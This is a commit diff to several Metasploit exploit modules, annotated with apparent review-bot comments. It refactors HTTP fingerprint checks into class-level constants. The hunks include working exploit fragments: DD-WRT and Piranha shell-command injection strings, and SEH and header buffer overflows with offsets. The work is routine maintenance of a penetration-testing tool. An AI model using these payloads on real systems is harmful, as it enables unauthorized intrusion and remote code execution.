http fingerprint checking update

git-svn-id: file:///home/svn/framework3/trunk@9719 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-07-07 17:38:59 +00:00
parent ba76698b5a
commit 663b863b6d
18 changed files with 69 additions and 120 deletions


@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /DD-WRT/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -33,8 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-2765' ], [ 'CVE', '2009-2765' ],
[ 'OSVDB', '55990' ], [ 'OSVDB', '55990' ],
[ 'BID', '35742' ], [ 'BID', '35742' ],
[ 'URL', 'http://www.milw0rm.com/exploits/9209'], [ 'URL', 'http://www.milw0rm.com/exploits/9209' ]
], ],
'Platform' => ['unix'], 'Platform' => ['unix'],
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
@ -59,10 +60,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if not (http_fingerprint =~ /DD-WRT/)
raise RuntimeError, "The target server doesn\'t seem to be running DD-WRT."
end
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
# TODO: force use of echo-ne CMD encoder # TODO: force use of echo-ne CMD encoder
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&" str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
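Review bot: The exploit-time guard that raised unless the banner matched /DD-WRT/ (L28-30) is gone, and the new class-level `HttpFingerprint` only replaces it if the HttpClient mixin consults that constant before `exploit` runs — that enforcement is not visible in this diff, so as written the module may send the command injection to any host. If the mixin does gate on the constant, say so beside it, e.g. `# Enforced by the HttpClient mixin before exploit runs; no in-method check needed`; if it does not, keep a one-line guard such as `raise RuntimeError, "Target does not look like DD-WRT" unless http_fingerprint =~ /DD-WRT/`. The `exploit` method continues past the hunk.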


@ -16,6 +16,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -81,11 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
info = http_fingerprint
if not (info =~ /Apache/)
raise RuntimeError, 'The target server is not running Apache.'
end
cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal') cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT" str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
print_status("Sending GET request with encoded command line...") print_status("Sending GET request with encoded command line...")
@ -103,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
print_status("Command successfully executed (according to the server).") print_status("Command successfully executed (according to the server).")
end end
end end
end end
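Review bot: `/Apache/` as the class-level fingerprint (L40) admits essentially every Apache host and says nothing about whether `/piranha/secure/passwd.php3` exists, so it filters far less than the removed guard on L46-49 did in spirit; the only real vulnerability signal in this module is the body match on L54. Either tighten the pattern or mark it as a coarse pre-filter, e.g. `# Coarse pre-filter only: Piranha sits behind Apache; the passwd.php3 response is the real check`. Whether the mixin applies the constant before `exploit` is not visible here.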


@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => datastore['PATH'] 'uri' => datastore['PATH']
}, 5) }, 5)
info = http_fingerprint({ :response => res }) info = http_fingerprint({ :response => res }) # check method
if (info =~ /Sun/) if (info =~ /Sun/)
print_status("Found server: #{info}") print_status("Found server: #{info}")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
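Review bot: The new comment `# check method` on L65 reads like a note to the author rather than documentation of what the call does here. Since the returned string is immediately matched against `/Sun/` to decide the CheckCode, say that instead, e.g. `# record the server fingerprint; the /Sun/ match below decides the check result`. The enclosing `check` method starts before this hunk.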


@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
http_fingerprint({ :response => res }) http_fingerprint({ :response => res }) # check method
if (res.code != 200) if (res.code != 200)
print_status("The server returned #{res.code} #{res.message}") print_status("The server returned #{res.code} #{res.message}")


@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/' 'uri' => '/'
}, 5) }, 5)
info = http_fingerprint({ :response => res }) info = http_fingerprint({ :response => res }) # check method / Custom server check
if res and res['Server'] if res and res['Server']
print_status("Found RTSP: #{res['Server']}") print_status("Found RTSP: #{res['Server']}")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
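Review bot: `http_fingerprint({ :response => res })` on L84 runs before the `if res` nil guard on L85, so a timed-out request reaches the helper with `res == nil`; elsewhere in this same commit the call was deliberately moved below the nil check, and it should be here too unless the helper is known to tolerate nil. `info` is assigned on L84 but the visible branch reads `res['Server']` directly, so either use `info` or drop the assignment. The enclosing method begins outside the hunk.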


@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}, 5) }, 5)
http_fingerprint({ :response => res }) http_fingerprint({ :response => res }) # check method
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/)) if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
ver = $1 ver = $1
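Review bot: The `http_fingerprint({ :response => res })` call on L94 precedes the `res and ...` guard on L95, so a nil response is handed to the helper before the method decides it is Safe. Move the call inside the guarded branch, or add `return Exploit::CheckCode::Safe if res.nil?` above it, to match the ordering this commit applies in the other `check` methods. The method starts and ends outside the hunk.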


@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}, 25) }, 25)
http_fingerprint({ :response => res }) http_fingerprint({ :response => res }) # check method
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/)) if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
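Review bot: Same ordering issue as the other TikiWiki module: L103 calls `http_fingerprint({ :response => res })` before L104 checks `res` for nil. Guard first, e.g. `return Exploit::CheckCode::Safe unless res`, then fingerprint, unless the helper is known to accept nil. The enclosing `check` begins outside the hunk.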


@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking Rank = AverageRanking
# XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Seh include Msf::Exploit::Seh
@ -75,31 +77,30 @@ class Metasploit3 < Msf::Exploit::Remote
# Identify the target based on the SecurityGateway version number # Identify the target based on the SecurityGateway version number
def auto_target def auto_target
print_status("Attempting to automatically select a target...") info = http_fingerprint({ :uri => '/SecurityGateway.dll' }) # automatic targetting
res = send_request_raw( if (info =~ /SecurityGateway (1\..*)$/)
{
'uri' => '/SecurityGateway.dll'
}, 10)
http_fingerprint({ :response => res })
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
case $1 case $1
when /1\.0\.1/ when /1\.0\.1/
return self.targets[1] return self.targets[1]
end end
end end
# Not vulnerable # Not vulnerable
return nil nil
end end
def check
if auto_target
Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit def exploit
# handle auto-targeting # handle auto-targeting
mytarget = target mytarget = target
if target.name =~ /Automatic/ if target.name =~ /Automatic/
print_status("Attempting to automatically select a target...")
mytarget = auto_target mytarget = auto_target
if mytarget.nil? if mytarget.nil?
raise RuntimeError, "Unable to automatically select a target" raise RuntimeError, "Unable to automatically select a target"
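Review bot: `check` was deleted outright (L133-138) — the old one was already broken, since `if auto_target ... end` never returned `Vulnerable` — so unless the mixin synthesises a check from `HttpFingerprint`, which is not visible here, this module no longer has one; a correct replacement is `def check; auto_target ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe; end`. The regex on L119 now runs against whatever string `http_fingerprint` returns instead of the raw `Server` header, and with `(1\..*)$` greedy to end of line anything the helper appends after the version lands in `$1`; `when /1\.0\.1/` still matches as a substring, but a bounded capture such as `/SecurityGateway (1\.[\d.]+)/` is safer. The `exploit` method continues past the hunk.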


@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -160,14 +162,13 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
response = send_request_raw({'uri' => '/'}, 5) response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
if response.nil? if response.nil?
print_status("No response to request") print_status("No response to request")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
http_fingerprint({ :response => response }) # Custom Server header matching
code = Exploit::CheckCode::Appears code = Exploit::CheckCode::Appears
case response['Server'] case response['Server']
@ -196,16 +197,14 @@ class Metasploit3 < Msf::Exploit::Remote
def auto_target def auto_target
response = send_request_raw({'uri' => '/'}, 5) response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
targets_to_try = []
if response.nil? if response.nil?
print_error("No response to request") print_error("No response to request")
return targets_to_try return targets_to_try
end end
http_fingerprint({ :response => response }) # Custom Server header matching / automatic target selection
targets_to_try = []
server_hdr = response['Server'] server_hdr = response['Server']
print_status("Server: #{server_hdr}") print_status("Server: #{server_hdr}")
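Review bot: Moving `targets_to_try = []` below the nil guard (L177) leaves `return targets_to_try` on L174 referring to a name that has not been assigned at that point in the method; Ruby parses it as a method call and raises NameError whenever the server does not answer (unless the module defines a method of that name, which is not visible). Change L174 to `return []`, or keep the assignment above `if response.nil?`. The `auto_target` method continues past the hunk.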


@ -14,7 +14,11 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
include Msf::Exploit::Remote::Tcp # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
# However, a proper Server header is returned when requesting /index.html or using HEAD.
HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
def initialize(info = {}) def initialize(info = {})
@ -50,40 +54,27 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'DisclosureDate' => 'Apr 20 2003', 'DisclosureDate' => 'Apr 20 2003',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self.class )
end end
def check def check
connect info = http_fingerprint # check method
if (info =~ /BadBlue\/2\.5/)
sock.put("GET / HTTP/1.0\r\n\r\n")
resp = sock.get_once
disconnect
if (resp =~ /BadBlue\/2.5/)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
return Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
def exploit def exploit
connect
uri = "GET /ext.dll?mfcisapicommand=" uri = "GET /ext.dll?mfcisapicommand="
sploit = rand_text_alphanumeric(500) sploit = rand_text_alphanumeric(500)
seh = generate_seh_payload(target.ret) seh = generate_seh_payload(target.ret)
sploit[492, seh.length] = seh sploit[492, seh.length] = seh
uri << sploit
print_status("Trying target #{target.name}...") print_status("Trying target #{target.name}...")
send_request_raw({ 'uri' => uri })
sock.put(uri + sploit + "\r\n\r\n")
handler handler
disconnect
end end
end end
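Review bot: `uri` on L214 still starts with the literal `"GET "` that the old raw-socket code needed, but it is now passed as `'uri'` to `send_request_raw`, which supplies the method itself, so the request line becomes `GET GET /ext.dll?... HTTP/1.1` and the server will not parse it. Drop the verb: `uri = "/ext.dll?mfcisapicommand="`. The SEH offset on L217 is indexed into `sploit` rather than the whole request, so it probably survives the switch from the bare HTTP/1.0 request to a full HttpClient request with headers, but that is worth re-verifying. Removing `Opt::RPORT(80)` is fine only if HttpClient defaults RPORT to 80, which is not visible here.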


@ -14,6 +14,10 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
# However, a proper Server header is returned when requesting /index.html or using HEAD.
HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Seh include Msf::Exploit::Seh
@ -58,11 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/', but it will if requesting /index.html
if not (http_fingerprint =~ /BadBlue\//)
raise RuntimeError, "The target server doesn't appear to be running BadBlue."
end
seh_offset = 4116 seh_offset = 4116
sploit = Rex::Text.pattern_create(seh_offset) sploit = Rex::Text.pattern_create(seh_offset)
# Need to jump over the nul byte # Need to jump over the nul byte


@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
@ -60,10 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if not (http_fingerprint =~ /Apache/)
raise RuntimeError, "The target server doesn't appear to be running Apache."
end
sploit = rand_text_alphanumeric(5800) sploit = rand_text_alphanumeric(5800)
sploit[5781, 8] = generate_seh_record(target.ret) sploit[5781, 8] = generate_seh_record(target.ret)
# Jump backward to the payload # Jump backward to the payload
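Review bot: With the guard on L258-260 removed and the class-level pattern also just `/Apache/`, the only thing stopping this SEH overwrite from being thrown at an unrelated server is whatever the mixin does with `HttpFingerprint`, which is not visible here; a memory-corruption payload at the wrong host is a crash rather than a no-op, so an Apache banner is a weak gate either way. At minimum document the expectation above the constant: `# Coarse gate only: any Apache banner passes; the vulnerable module is not identified by the Server header`. `exploit` continues past the hunk.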


@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
@ -64,27 +66,16 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class ) ], self.class )
end end
def auto_target def check
info = http_fingerprint info = http_fingerprint # check method
# NOTE: Version 2.2 still reports "1.0" in the "Server" header # NOTE: Version 2.2 still reports "1.0" in the "Server" header
if (info =~ /Easy Chat Server\/1\.0/) if (info =~ /Easy Chat Server\/1\.0/)
return targets[0]
end
nil
end
def check
if auto_target
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
def exploit def exploit
if not auto_target
raise RuntimeError, "The server doesn't appear to be running a vulnerable EasyChatServer"
end
# randomize some values. # randomize some values.
val = rand_text_alpha(rand(10) + 1) val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1) num = rand_text_numeric(1)


@ -28,6 +28,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::Seh
@ -89,23 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote
)) ))
end end
def auto_target
info = http_fingerprint
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
ver = $1
#print_status("HTTPDX version detected : #{ver}")
# this will need to be updated if httpdx is ever fixed :)
case ver
when "1.4"
return targets[0]
end
end
nil
end
def check def check
if (auto_target) info = http_fingerprint # check method
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -113,10 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
if not auto_target
raise RuntimeError, "The server doesn't appear to be running a vulnerable version of HTTPDX"
end
uri = payload.encoded uri = payload.encoded
if target['Offset'] > payload_space if target['Offset'] > payload_space
pad = target['Offset'] - payload_space pad = target['Offset'] - payload_space
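Review bot: The new `check` (L323-327) reports Vulnerable for any `httpdx/<ver> (Win32)` banner, whereas the deleted `auto_target` only accepted `ver == "1.4"` and carried the note that the case needs updating once httpdx is fixed, so the commit widens `Vulnerable` to versions the old code deliberately rejected. Either keep the version gate — `return Exploit::CheckCode::Vulnerable if $1 == "1.4"` after the match — or downgrade the unversioned match to `Exploit::CheckCode::Appears`. The exploit-time guard on L330-332 is also gone, so the module now fires at any httpdx build unless the mixin filters on `HttpFingerprint`, which is not visible here.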


@ -226,7 +226,7 @@ For now, that will have to be done manually.
def get_version def get_version
info = http_fingerprint info = http_fingerprint # Custom version extraction / automatic target
if info and (info =~ /httpdx\/(.*) \(Win32\)/) if info and (info =~ /httpdx\/(.*) \(Win32\)/)
return $1 return $1
end end


@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => [ /MailEnable/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -51,9 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
info = http_fingerprint info = http_fingerprint # check method
if (info =~ /MailEnable/)
if (info =~ /.*MailEnable/)
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -62,7 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
buffer = make_nops(24) + payload.encoded + [target.ret].pack('V') buffer = make_nops(24) + payload.encoded + [target.ret].pack('V')
send_request_raw({ send_request_raw(
{
'headers' => { 'Authorization' => buffer } 'headers' => { 'Authorization' => buffer }
}, 2) }, 2)


@ -15,6 +15,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = GreatRanking
HttpFingerprint = { :pattern => /Savant\/3\.1/ }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -69,16 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end end
def auto_target
info = http_fingerprint
if info and (info =~ /Savant\/3\.1/)
return targets[0]
end
nil
end
def check def check
if (auto_target) info = http_fingerprint # check method
if info and (info =~ /Savant\/3\.1/)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -112,11 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
mytarget = auto_target
if not mytarget
raise RuntimeError, 'The target web server is not Savant 3.1'
end
print_status("Searching for a suitable nopsled...") print_status("Searching for a suitable nopsled...")
findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted. findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
until findnop until findnop
@ -124,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
print_status("Found one! Sending exploit.") print_status("Found one! Sending exploit.")
sploit = findnop + " /" + payload.encoded + [mytarget['Ret']].pack('V') sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
res = send_request_raw( res = send_request_raw(
{ {
'method' => sploit, 'method' => sploit,
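Review bot: L376 sets `HttpFingerprint = { :pattern => /Savant\/3\.1/ }` with a bare Regexp, while every other module in this commit wraps the pattern in an array; if the mixin iterates over `:pattern`, this one will error or be ignored. Make it `HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }` for consistency. `auto_target` is gone and `exploit` now uses `target['Ret']` (L407), which is fine as long as nothing outside the hunks still calls `auto_target`.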


@ -14,6 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
# XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -68,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def auto_target def auto_target
res = send_request_raw( res = send_request_raw(
{ {
'uri' => datastore['URL'] 'uri' => datastore['URL']
}, -1) }, -1)
http_fingerprint({ :response => res }) # XXX: Needs custom body match
http_fingerprint({ :response => res })
# Was a vulnerable system detected? # Was a vulnerable system detected?
t = nil t = nil